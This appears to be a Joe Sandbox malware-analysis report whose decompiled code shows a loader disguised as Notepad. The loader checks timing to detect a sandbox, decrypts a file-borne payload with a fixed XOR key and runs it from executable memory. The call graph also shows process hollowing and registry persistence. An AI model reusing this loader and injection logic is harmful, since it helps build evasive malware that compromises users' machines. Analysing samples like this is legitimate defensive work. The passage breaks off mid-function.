8609 2830b5 8602->8609 8603 282ff3 _memset 8607 283cf8 __write_nolock 66 API calls 8603->8607 8604 2856b8 __flush 66 API calls 8604->8606 8606->8602 8606->8603 8606->8604 8612 2855c2 8606->8612 8642 284ee9 8606->8642 8662 2856de 8606->8662 8607->8598 8610 2836c5 _fseek 2 API calls 8609->8610 8611 2830bd 8610->8611 8611->8594 8613 2855ce __mtinitlocknum 8612->8613 8614 2855d6 8613->8614 8617 2855f1 8613->8617 8615 283d0b __write_nolock 66 API calls 8614->8615 8618 2855db 8615->8618 8616 2855fd 8619 283d0b __write_nolock 66 API calls 8616->8619 8617->8616 8620 285637 8617->8620 8621 283cf8 __write_nolock 66 API calls 8618->8621 8622 285602 8619->8622 8624 285659 8620->8624 8625 285644 8620->8625 8633 2855e3 __mtinitlocknum 8621->8633 8623 283cf8 __write_nolock 66 API calls 8622->8623 8626 28560a 8623->8626 8628 289645 ___lock_fhandle 68 API calls 8624->8628 8627 283d0b __write_nolock 66 API calls 8625->8627 8631 283ca6 __write_nolock 11 API calls 8626->8631 8629 285649 8627->8629 8630 28565f 8628->8630 8632 283cf8 __write_nolock 66 API calls 8629->8632 8634 28566d 8630->8634 8635 285681 8630->8635 8631->8633 8632->8626 8633->8606 8636 28500b __read_nolock 75 API calls 8634->8636 8637 283cf8 __write_nolock 66 API calls 8635->8637 8638 285679 8636->8638 8639 285686 8637->8639 8671 2856b0 8638->8671 8640 283d0b __write_nolock 66 API calls 8639->8640 8640->8638 8643 284ef6 8642->8643 8647 284f0b 8642->8647 8644 283cf8 __write_nolock 66 API calls 8643->8644 8645 284efb 8644->8645 8646 283ca6 __write_nolock 11 API calls 8645->8646 8654 284f06 8646->8654 8648 284f40 8647->8648 8647->8654 8675 2885a7 8647->8675 8650 2856b8 __flush 66 API calls 8648->8650 8651 284f54 8650->8651 8652 2855c2 __read 78 API calls 8651->8652 8653 284f5b 8652->8653 8653->8654 8655 2856b8 __flush 66 API calls 8653->8655 8654->8606 8656 284f7e 8655->8656 8656->8654 8657 2856b8 __flush 66 API calls 8656->8657 8658 284f8a 8657->8658 8658->8654 8659 2856b8 __flush 66 API calls 8658->8659 8660 284f97 8659->8660 8661 2856b8 __flush 66 API calls 8660->8661 8661->8654 8664 2856ef _memset 8662->8664 8667 2856eb _memmove 8662->8667 8663 2856f5 8665 283cf8 __write_nolock 66 API calls 8663->8665 8664->8663 8664->8667 8669 28573a 8664->8669 8666 2856fa 8665->8666 8668 283ca6 __write_nolock 11 API calls 8666->8668 8667->8606 8668->8667 8669->8667 8670 283cf8 __write_nolock 66 API calls 8669->8670 8670->8666 8674 2896e4 LeaveCriticalSection 8671->8674 8673 2856b6 8673->8633 8674->8673 8676 286c85 __malloc_crt 66 API calls 8675->8676 8677 2885bc 8676->8677 8677->8648 8693 5f005f GetPEB 8678->8693 8680 5f08fd 8681 5f0a98 8680->8681 8682 5f0aa6 CreateProcessW 8680->8682 8686 5f0ad0 8680->8686 8687 5f1c52 11 API calls 8680->8687 8690 5f0d5a SetThreadContext 8680->8690 8692 5f1aa3 11 API calls 8680->8692 8694 5f1b38 8680->8694 8703 5f18f1 8680->8703 8712 5f19f2 8680->8712 8681->7753 8683 5f0ad5 GetThreadContext 8682->8683 8682->8686 8684 5f0af5 ReadProcessMemory 8683->8684 8683->8686 8684->8680 8684->8686 8686->8681 8721 5f1aa3 8686->8721 8687->8680 8690->8680 8690->8686 8692->8680 8693->8680 8695 5f1b53 8694->8695 8730 5f013e GetPEB 8695->8730 8697 5f1b74 8698 5f1c2c 8697->8698 8699 5f1b7c 8697->8699 8747 5f1f7e 8698->8747 8732 5f16f2 8699->8732 8702 5f1c13 8702->8680 8704 5f190c 8703->8704 8705 5f013e GetPEB 8704->8705 8706 5f192d 8705->8706 8707 5f19bf 8706->8707 8708 5f1935 8706->8708 8757 5f1fa2 8707->8757 8710 5f16f2 10 API calls 8708->8710 8711 5f19a6 8710->8711 8711->8680 8713 5f1a0d 8712->8713 8714 5f013e GetPEB 8713->8714 8715 5f1a2e 8714->8715 8716 5f1a78 8715->8716 8717 5f1a32 8715->8717 8760 5f1fb4 8716->8760 8718 5f16f2 10 API calls 8717->8718 8720 5f1a6d 8718->8720 8720->8680 8722 5f1ab6 8721->8722 8723 5f013e GetPEB 8722->8723 8724 5f1ad7 8723->8724 8725 5f1adb 8724->8725 8726 5f1b21 8724->8726 8727 5f16f2 10 API calls 8725->8727 8763 5f1f6c 8726->8763 8729 5f1b16 8727->8729 8729->8681 8731 5f0160 8730->8731 8731->8697 8750 5f005f GetPEB 8732->8750 8734 5f173b 8751 5f0109 GetPEB 8734->8751 8737 5f17c8 8738 5f17d9 VirtualAlloc 8737->8738 8742 5f189d 8737->8742 8739 5f17ef ReadFile 8738->8739 8738->8742 8740 5f1804 VirtualAlloc 8739->8740 8739->8742 8741 5f1825 8740->8741 8740->8742 8741->8742 8745 5f188c FindCloseChangeNotification 8741->8745 8746 5f1890 VirtualFree 8741->8746 8743 5f18db VirtualFree 8742->8743 8744 5f18e6 8742->8744 8743->8744 8744->8702 8745->8746 8746->8742 8748 5f16f2 10 API calls 8747->8748 8749 5f1f88 8748->8749 8749->8702 8750->8734 8752 5f011c 8751->8752 8754 5f0131 CreateFileW 8752->8754 8755 5f017b GetPEB 8752->8755 8754->8737 8754->8742 8756 5f019f 8755->8756 8756->8752 8758 5f16f2 10 API calls 8757->8758 8759 5f1fac 8758->8759 8759->8711 8761 5f16f2 10 API calls 8760->8761 8762 5f1fbe 8761->8762 8762->8720 8764 5f16f2 10 API calls 8763->8764 8765 5f1f76 8764->8765 8765->8729 8766->7759 8792 5f005f GetPEB 8767->8792 8769 5f0f31 8793 5f005f GetPEB 8769->8793 8771 5f0f44 8794 5f005f GetPEB 8771->8794 8773 5f0f57 8795 5f0ebf 8773->8795 8775 5f0f65 8776 5f0f81 VirtualAllocExNuma 8775->8776 8777 5f0f8e 8776->8777 8800 5f0e1f 8777->8800 8807 5f005f GetPEB 8780->8807 8782 5f066b 8783 5f0813 CreateFileW 8782->8783 8808 5f037c 8782->8808 8783->7762 8783->7765 8788 5f085e RegGetValueW 8788->8783 8789 5f087b RegOpenKeyExW 8788->8789 8789->8788 8790 5f0897 RegSetValueExW 8789->8790 8790->8783 8792->8769 8793->8771 8794->8773 8805 5f005f GetPEB 8795->8805 8797 5f0ecf 8798 5f0ed5 GetSystemInfo 8797->8798 8799 5f0f00 8798->8799 8799->8775 8806 5f005f GetPEB 8800->8806 8802 5f0e2b 8803 5f0e4b VirtualAlloc 8802->8803 8804 5f0e68 8803->8804 8804->7761 8805->8797 8806->8802 8807->8782 8824 5f005f GetPEB 8808->8824 8810 5f03d6 8811 5f0401 PathFileExistsW 8810->8811 8812 5f040d CreateDirectoryW 8811->8812 8813 5f041a 8811->8813 8812->8813 8813->8783 8814 5f020a 8813->8814 8825 5f005f GetPEB 8814->8825 8816 5f026a 8817 5f02db PathFileExistsW 8816->8817 8818 5f02ec CreateFileW 8817->8818 8820 5f0309 8817->8820 8819 5f030d 8818->8819 8818->8820 8819->8820 8821 5f0318 VirtualAlloc 8819->8821 8820->8783 8820->8788 8821->8820 8822 5f032e ReadFile 8821->8822 8822->8820 8823 5f033d FindCloseChangeNotification CreateFileW WriteFile 8822->8823 8823->8820 8824->8810 8825->8816 8827 281679 SetRect lstrcpyW LoadStringW LoadStringW RegOpenKeyW 8826->8827 8827->7775 8827->7776 8829 281044 RegQueryValueExW 8828->8829 8830 281085 MulDiv 8828->8830 8831 28107b RegCloseKey 8829->8831 8832 28106c 8829->8832 8830->7820 8831->8830 8832->8831 8833->7843 8837 285e8e 8834->8837 8836 285ff5 8838 285e9a __mtinitlocknum 8837->8838 8839 286fb4 __lock 61 API calls 8838->8839 8840 285ea1 8839->8840 8842 285ecc DecodePointer 8840->8842 8845 285f4b 8840->8845 8844 285ee3 DecodePointer 8842->8844 8842->8845 8850 285ef6 8844->8850 8860 285fb9 8845->8860 8848 285fc8 __mtinitlocknum 8848->8836 8849 285fb0 8851 285d76 __mtinitlocknum 3 API calls 8849->8851 8850->8845 8854 285f0d DecodePointer 8850->8854 8857 285f1c DecodePointer DecodePointer 8850->8857 8858 286758 RtlEncodePointer 8850->8858 8852 285fb9 8851->8852 8853 285fc6 8852->8853 8865 286edb LeaveCriticalSection 8852->8865 8853->8836 8859 286758 RtlEncodePointer 8854->8859 8857->8850 8858->8850 8859->8850 8861 285fbf 8860->8861 8862 285f99 8860->8862 8866 286edb LeaveCriticalSection 8861->8866 8862->8848 8864 286edb LeaveCriticalSection 8862->8864 8864->8849 8865->8853 8866->8862 7215 286758 RtlEncodePointer

                    Executed Functions

                    Function 002828A0 Relevance: 77.3, APIs: 35, Strings: 9, Instructions: 251windowlibraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 75%
                    			E002828A0(signed long long __fp0, struct HINSTANCE__* _a4, intOrPtr _a12, int _a16) {
				struct _WNDCLASSEXW _v52;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct tagMONITORINFO _v100;
				struct tagMSG _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t46;
				void* _t47;
				struct HINSTANCE__* _t54;
				int _t56;
				struct HMONITOR__* _t61;
				intOrPtr _t63;
				struct HWND__* _t65;
				int _t75;
				int _t78;
				int _t79;
				int _t80;
				void* _t87;
				long _t89;
				void* _t91;
				void* _t98;
				intOrPtr* _t99;
				void* _t104;
				intOrPtr _t107;
				signed int _t113;
				int _t116;
				void* _t127;
				_Unknown_base(*)()* _t129;
				int _t130;
				void* _t134;
				void* _t135;
				int _t139;
				struct HACCEL__* _t140;
				long _t143;
				signed int _t144;
				void* _t146;
				signed long long _t155;

				_t155 = __fp0;
				_t146 = (_t144 & 0xfffffff8) - 0x7c;
				_t99 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "GetTickCount");
				_v128.message = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "Sleep");
				_t129 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "VirtualAlloc");
				_t46 =  *_t99(_t127, _t135, _t98);
				_t137 = _t46; // executed
				Sleep(0x2be);
				_t47 =  *_t99();
				_t150 = _t47 - _t46 - 0x2bc;
				if(_t47 - _t46 >= 0x2bc) {
					_t87 = E00282D3E(_a12, L"rb"); // executed
					_push(2);
					_t104 = _t87;
					_push(0);
					_push(_t104); // executed
					E0028335F(_t104, _t129, _t137, _t150); // executed
					_push(_t104); // executed
					_t89 = E00283270(_t104, _t129, _t137, _t150); // executed
					_push(0);
					_push(0);
					_push(_t104);
					_t143 = _t89; // executed
					E0028335F(_t104, _t129, _t143, _t150); // executed
					_t91 = VirtualAlloc(0, _t143, 0x3000, 0x40); // executed
					_t134 = _t91;
					E002830BF(_t134, _t143, 1, _t104); // executed
					_t146 = _t146 + 0x34;
					_t113 = 0;
					if(_t143 != 0) {
						do {
							_t10 = _t113 - (0xaaaaaaab * _t113 >> 0x20 >> 3) + (0xaaaaaaab * _t113 >> 0x20 >> 3) * 2 + (0xaaaaaaab * _t113 >> 0x20 >> 3) + (0xaaaaaaab * _t113 >> 0x20 >> 3) * 2 + (0xaaaaaaab * _t113 >> 0x20 >> 3) + (0xaaaaaaab * _t113 >> 0x20 >> 3) * 2 + (0xaaaaaaab * _t113 >> 0x20 >> 3) + (0xaaaaaaab * _t113 >> 0x20 >> 3) * 2 + "248058040134"; // 0x30383432
							_t114 =  *_t10;
							 *(_t134 + _t113) =  *(_t134 + _t113) ^  *_t10;
							_t113 = _t113 + 1;
						} while (_t113 < _t143);
					}
					 *_t134(); // executed
				}
				 *0x295f64 = RegisterWindowMessageW(L"commdlg_FindReplace");
				E00285760(0x2970e0, 0, 0x11f4);
				 *0x2970e0 = _a4;
				E00281640(_t114, _t155);
				E00285760( &_v52, 0, 0x30);
				_t54 =  *0x2970e0;
				_v52.cbSize = 0x30;
				_v52.lpfnWndProc = E00282340;
				_v52.hInstance = _t54;
				_v52.hIcon = LoadIconW(_t54, 0x300);
				_t56 = GetSystemMetrics(0x32);
				_v52.hIconSm = LoadImageW( *0x2970e0, 0x300, 1, GetSystemMetrics(0x31), _t56, 0x8000);
				_v52.hCursor = LoadCursorW(0, 0x7f00);
				_v52.hbrBackground = 6;
				_v52.lpszMenuName = 0x201;
				_v52.lpszClassName = L"Notepad";
				_t61 = RegisterClassExW( &_v52);
				if(_t61 != 0) {
					__imp__MonitorFromRect(0x295f68, 1);
					_v100.cbSize = 0x28;
					GetMonitorInfoW(_t61,  &_v100);
					_t116 =  *0x295f68; // 0x0
					_t139 =  *0x295f6c; // 0x0
					_t63 =  *0x295f74; // 0x0
					_t107 =  *0x295f70; // 0x0
					_t130 = _t116;
					__eflags = _t116 - _v72;
					if(_t116 >= _v72) {
						L10:
						_t139 = 0x80000000;
						_t130 = 0x80000000;
					} else {
						__eflags = _t139 - _v68;
						if(_t139 >= _v68) {
							goto L10;
						} else {
							__eflags = _t107 - _v100.rcWork;
							if(_t107 < _v100.rcWork) {
								goto L10;
							} else {
								__eflags = _t63 - _v76;
								if(_t63 < _v76) {
									goto L10;
								}
							}
						}
					}
					_t65 = CreateWindowExW(0, L"Notepad", L"Notepad", 0xcf0000, _t130, _t139, _t107 - _t116, _t63 -  *0x295f6c, 0, 0,  *0x2970e0, 0);
					 *0x2970e4 = _t65;
					__eflags = _t65;
					if(_t65 == 0) {
						 *0x280000();
						ExitProcess(1);
					}
					E00281E60();
					 *0x280000();
					ShowWindow( *0x2970e4, _a16);
					UpdateWindow( *0x2970e4);
					DragAcceptFiles( *0x2970e4, 1);
					E00282690(GetCommandLineW());
					_t140 = LoadAcceleratorsW(_a4, 0x203);
					_t75 = GetMessageW( &_v128, 0, 0, 0);
					__eflags = _t75;
					if(_t75 != 0) {
						do {
							_t78 = IsDialogMessageW( *0x2970e8,  &_v128);
							__eflags = _t78;
							if(_t78 == 0) {
								_t80 = TranslateAcceleratorW( *0x2970e4, _t140,  &_v128);
								__eflags = _t80;
								if(_t80 == 0) {
									TranslateMessage( &_v128);
									DispatchMessageW( &_v128);
								}
							}
							_t79 = GetMessageW( &_v128, 0, 0, 0);
							__eflags = _t79;
						} while (_t79 != 0);
					}
					return _v128.wParam;
				} else {
					return 0;
				}
			}












































                    0x002828a0
                    0x002828a6
                    0x002828d1
                    0x002828e2
                    0x002828eb
                    0x002828ed
                    0x002828f4
                    0x002828f6
                    0x002828fa
                    0x002828fe
                    0x00282903
                    0x0028290e
                    0x00282913
                    0x00282915
                    0x00282917
                    0x00282919
                    0x0028291a
                    0x0028291f
                    0x00282920
                    0x00282925
                    0x00282927
                    0x00282929
                    0x0028292a
                    0x0028292c
                    0x0028293e
                    0x00282943
                    0x00282947
                    0x0028294c
                    0x0028294f
                    0x00282953
                    0x00282955
                    0x0028296a
                    0x0028296a
                    0x00282970
                    0x00282973
                    0x00282974
                    0x00282955
                    0x00282978
                    0x00282978
                    0x00282991
                    0x00282997
                    0x002829a2
                    0x002829a7
                    0x002829b5
                    0x002829ba
                    0x002829c8
                    0x002829d0
                    0x002829d8
                    0x002829ef
                    0x002829f3
                    0x00282a16
                    0x00282a23
                    0x00282a2c
                    0x00282a34
                    0x00282a3f
                    0x00282a4a
                    0x00282a53
                    0x00282a67
                    0x00282a73
                    0x00282a7b
                    0x00282a81
                    0x00282a87
                    0x00282a8d
                    0x00282a92
                    0x00282a98
                    0x00282a9a
                    0x00282a9e
                    0x00282ab2
                    0x00282ab2
                    0x00282ab7
                    0x00282aa0
                    0x00282aa0
                    0x00282aa4
                    0x00000000
                    0x00282aa6
                    0x00282aa6
                    0x00282aaa
                    0x00000000
                    0x00282aac
                    0x00282aac
                    0x00282ab0
                    0x00000000
                    0x00000000
                    0x00282ab0
                    0x00282aaa
                    0x00282aa4
                    0x00282ae3
                    0x00282ae9
                    0x00282aee
                    0x00282af0
                    0x00282af2
                    0x00282afa
                    0x00282afa
                    0x00282b00
                    0x00282b05
                    0x00282b15
                    0x00282b22
                    0x00282b31
                    0x00282b3d
                    0x00282b62
                    0x00282b64
                    0x00282b66
                    0x00282b68
                    0x00282b70
                    0x00282b7b
                    0x00282b81
                    0x00282b83
                    0x00282b92
                    0x00282b94
                    0x00282b96
                    0x00282b9d
                    0x00282ba8
                    0x00282ba8
                    0x00282b96
                    0x00282bb9
                    0x00282bbb
                    0x00282bbb
                    0x00282b70
                    0x00282bc9
                    0x00282a55
                    0x00282a5d
                    0x00282a5d

                    APIs
                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTickCount), ref: 002828BC
                    • GetProcAddress.KERNEL32(00000000), ref: 002828C5
                    • GetModuleHandleW.KERNEL32(Kernel32.dll,Sleep), ref: 002828D3
                    • GetProcAddress.KERNEL32(00000000), ref: 002828D6
                    • GetModuleHandleW.KERNEL32(Kernel32.dll,VirtualAlloc), ref: 002828E6
                    • GetProcAddress.KERNEL32(00000000), ref: 002828E9
                    • Sleep.KERNELBASE(000002BE), ref: 002828F6
                    • _fseek.LIBCMT ref: 0028291A
                    • _fseek.LIBCMT ref: 0028292C
                      • Part of subcall function 0028335F: __lock_file.LIBCMT ref: 002833A0
                      • Part of subcall function 0028335F: __fseek_nolock.LIBCMT ref: 002833B1
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 0028293E
                    • __fread_nolock.LIBCMT ref: 00282947
                    • RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 0028297F
                    • _memset.LIBCMT ref: 00282997
                    • _memset.LIBCMT ref: 002829B5
                    • LoadIconW.USER32 ref: 002829DC
                    • GetSystemMetrics.USER32 ref: 002829F3
                    • GetSystemMetrics.USER32 ref: 002829F8
                    • LoadImageW.USER32 ref: 00282A09
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00282A1D
                    • RegisterClassExW.USER32 ref: 00282A4A
                      • Part of subcall function 00282D3E: __wfsopen.LIBCMT ref: 00282D4B
                    • MonitorFromRect.USER32(00295F68,00000001), ref: 00282A67
                    • GetMonitorInfoW.USER32 ref: 00282A7B
                    • CreateWindowExW.USER32 ref: 00282AE3
                    • ExitProcess.KERNEL32 ref: 00282AFA
                    • ShowWindow.USER32(?,?,?,?,?,?,?,?,?), ref: 00282B15
                    • UpdateWindow.USER32(?), ref: 00282B22
                    • DragAcceptFiles.SHELL32(?,00000001), ref: 00282B31
                    • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?), ref: 00282B37
                    • LoadAcceleratorsW.USER32 ref: 00282B4B
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00282B64
                    • IsDialogMessageW.USER32(?,?), ref: 00282B7B
                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00282B92
                    • TranslateMessage.USER32(?), ref: 00282B9D
                    • DispatchMessageW.USER32 ref: 00282BA8
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00282BB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Message$LoadWindow$AddressHandleModuleProc$MetricsMonitorRegisterSystemTranslate_fseek_memset$AcceleratorAcceleratorsAcceptAllocClassCommandCreateCursorDialogDispatchDragExitFilesFromIconImageInfoLineProcessRectShowSleepUpdateVirtual__fread_nolock__fseek_nolock__lock_file__wfsopen
                    • String ID: ($0$GetTickCount$Kernel32.dll$Notepad$Notepad$Sleep$VirtualAlloc$commdlg_FindReplace
                    • API String ID: 1051210470-2033289487
                    • Opcode ID: 49bfb13e275e2e19c8664da8b8f9b01c261d6ee4aa18747a999dce2a62f3af5f
                    • Instruction ID: b6a841668ad9cee587483ff2fed6c380b09105e22d734fb97bb9eab9265952bc
                    • Opcode Fuzzy Hash: 49bfb13e275e2e19c8664da8b8f9b01c261d6ee4aa18747a999dce2a62f3af5f
                    • Instruction Fuzzy Hash: F081D175661305AFD710EFB1EC8EF5B3BE8EF84B40F10451AFA45972D1DAB0A8148BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F0F9C Relevance: 6.6, APIs: 4, Instructions: 598COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 312 5f0f9c-5f1194 call 5f005f call 5f0f1d call 5f0073 * 8 334 5f119b-5f11ab 312->334 335 5f1196 312->335 338 5f11ad 334->338 339 5f11b2-5f11e9 call 5f0422 CreateFileW 334->339 336 5f16ee-5f16f1 335->336 338->336 342 5f11eb 339->342 343 5f11f0-5f121f VirtualAlloc ReadFile 339->343 342->336 344 5f1226-5f1239 343->344 345 5f1221 343->345 347 5f123f-5f16d0 344->347 348 5f16d5-5f16e4 call 5f08ef 344->348 345->336 351 5f16e6-5f16e8 ExitProcess 348->351
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: AllocNumaVirtual
                    • String ID:
                    • API String ID: 4233825816-0
                    • Opcode ID: e71b2ba7b68352c0358678b0ec84456f6d205c5ce43e8e75770dc2b316dfe94d
                    • Instruction ID: 85158f40ccec79ddfc935880644322fb53015883559292df210a3bb1cf670f55
                    • Opcode Fuzzy Hash: e71b2ba7b68352c0358678b0ec84456f6d205c5ce43e8e75770dc2b316dfe94d
                    • Instruction Fuzzy Hash: F442C720D5D2DCADDB12CBE994257FCBFB05F16201F0845CAE5E4E6283C57A838ADB25
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F0EBF Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 527 5f0ebf-5f0f05 call 5f005f call 5f0073 GetSystemInfo 533 5f0f0e 527->533 534 5f0f07-5f0f0a 527->534 535 5f0f10-5f0f13 533->535 534->535
                    APIs
                    • GetSystemInfo.KERNELBASE(?), ref: 005F0EDC
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: InfoSystem
                    • String ID:
                    • API String ID: 31276548-0
                    • Opcode ID: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
                    • Instruction ID: 854c0effcf97720dbea36b4306b48eb30308c60dad1b53df4d0d5d158dfb5860
                    • Opcode Fuzzy Hash: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
                    • Instruction Fuzzy Hash: A8F0A771E1410CABDB18E6B8894DABF7BACE748300F104569E706D3182D93885404664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F16F2 Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,005F1F88,7FAB7E30), ref: 005F17B8
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,005F1F88,7FAB7E30,005F1C46,00000000,00000040), ref: 005F17E2
                    • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,005F1F88,7FAB7E30,005F1C46,00000000), ref: 005F17F9
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,005F1F88,7FAB7E30,005F1C46,00000000,00000040), ref: 005F181B
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,005F1F88,7FAB7E30,005F1C46,00000000,00000040,?,00000000,0000000E), ref: 005F188D
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,005F1F88,7FAB7E30,005F1C46,00000000,00000040,?), ref: 005F1898
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,005F1F88,7FAB7E30,005F1C46,00000000,00000040,?), ref: 005F18E3
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                    • String ID:
                    • API String ID: 656311269-0
                    • Opcode ID: 4a568b56e6b6568f10bfb6049f2983b1abefa57c434a2fe01c266273d55ac239
                    • Instruction ID: 437a0da20f010b6ed66d72b2ec36691de5ca11d482f767d428720bf34ce61e16
                    • Opcode Fuzzy Hash: 4a568b56e6b6568f10bfb6049f2983b1abefa57c434a2fe01c266273d55ac239
                    • Instruction Fuzzy Hash: CC518F71E00619BBDB209FB4CD89BBEBBB9BF44750F144525FA01F7281DA7899018B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00282E75 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 98 282e75-282e91 99 282ead 98->99 100 282e93-282e97 98->100 102 282eaf-282eb3 99->102 100->99 101 282e99-282e9b 100->101 103 282e9d-282ea2 call 283cf8 101->103 104 282eb4-282eb9 101->104 115 282ea8 call 283ca6 103->115 106 282ebb-282ec5 104->106 107 282ec7-282eca 104->107 106->107 109 282ee8-282ef8 106->109 110 282ed8-282eda 107->110 111 282ecc-282ed5 call 285760 107->111 113 282efa-282f00 109->113 114 282f02 109->114 110->103 112 282edc-282ee6 110->112 111->110 112->103 112->109 117 282f09-282f0b 113->117 114->117 115->99 120 282feb-282fee 117->120 121 282f11-282f18 117->121 120->102 122 282f1a-282f1f 121->122 123 282f5e-282f61 121->123 122->123 126 282f21 122->126 124 282fbf-282fc0 call 284ee9 123->124 125 282f63-282f67 123->125 132 282fc5-282fc9 124->132 128 282f88-282f8f 125->128 129 282f69-282f72 125->129 130 283019 126->130 131 282f27-282f2b 126->131 135 282f91 128->135 136 282f93-282f96 128->136 133 282f7d-282f82 129->133 134 282f74-282f7b 129->134 139 28301d-283026 130->139 137 282f2d 131->137 138 282f2f-282f32 131->138 132->139 140 282fcb-282fcf 132->140 141 282f84-282f86 133->141 134->141 135->136 142 282f98-282fa4 call 2856b8 call 2855c2 136->142 143 282ff3-282ff7 136->143 137->138 138->143 144 282f38-282f59 call 2856de 138->144 139->102 140->143 145 282fd1-282fe0 140->145 141->136 158 282fa9-282fae 142->158 146 283009-283014 call 283cf8 143->146 147 282ff9-283006 call 285760 143->147 150 282fe3-282fe5 144->150 145->150 146->115 147->146 150->120 150->121 159 28302b-28302f 158->159 160 282fb0-282fb3 158->160 159->139 160->130 161 282fb5-282fbd 160->161 161->150
                    C-Code - Quality: 97%
                    			E00282E75(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				char _t89;
				signed int _t96;
				signed int _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				signed int _t109;
				char* _t110;
				signed int _t120;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;

				_t110 = _a4;
				_t108 = _a8;
				_t123 = _a12;
				_v12 = _t110;
				_v8 = _t108;
				if(_t123 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t131 = _t110;
					if(_t110 != 0) {
						_t126 = _a20;
						__eflags = _t126;
						if(_t126 == 0) {
							L9:
							__eflags = _t108 - 0xffffffff;
							if(_t108 != 0xffffffff) {
								_t82 = E00285760(_t110, 0, _t108);
								_t127 = _t127 + 0xc;
							}
							__eflags = _t126;
							if(__eflags == 0) {
								goto L3;
							} else {
								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t124 = _t123 * _a16;
								__eflags =  *(_t126 + 0xc) & 0x0000010c;
								_v20 = _t124;
								_t109 = _t124;
								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t126 + 0x18));
								}
								__eflags = _t124;
								if(_t124 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t126 + 0xc) & 0x0000010c;
										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t109 - _v16;
											if(_t109 < _v16) {
												_t89 = E00284EE9(_t109, _t124, _t126); // executed
												__eflags = _t89 - 0xffffffff;
												if(_t89 == 0xffffffff) {
													L45:
													return (_t124 - _t109) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L41:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
